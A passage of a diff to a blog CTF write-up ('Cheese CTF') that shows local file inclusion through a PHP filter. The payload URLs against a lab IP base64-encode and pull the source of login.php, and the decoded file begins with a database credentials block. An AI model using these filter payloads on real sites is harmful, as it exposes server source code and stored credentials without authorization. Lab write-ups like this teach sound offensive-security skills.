rizi85/rizi85.github.io/_posts/writeups/2024-10-03-cheese_ctf.md

 ```
 4. Further investigating the app I landed on `Orders` page where the PHP filter is used `http://10.10.213.211/secret-script.php?file=php://filter/resource=orders.html`
 5. Using the base64 encoding with filter we can exfiltrate the content of the PHP file; for this we can use the filter with `http://10.10.213.211/secret-script.php?file=php://filter/read=convert.base64-encode/resource=login.php` to check the content and validations for login page
-6. This payload will return the base64 encoded version of `login.php` page (we can use the Burp Suite Decoder, or Linux based tools to decode):
+6. This payload will return the base64 encoded version of `login.php` page (we can use the Burp Suite Decoder, or Linux based tools to decode)

 ```sh

 <?php
 // Replace these with your database credentials
 $servername = "localhost";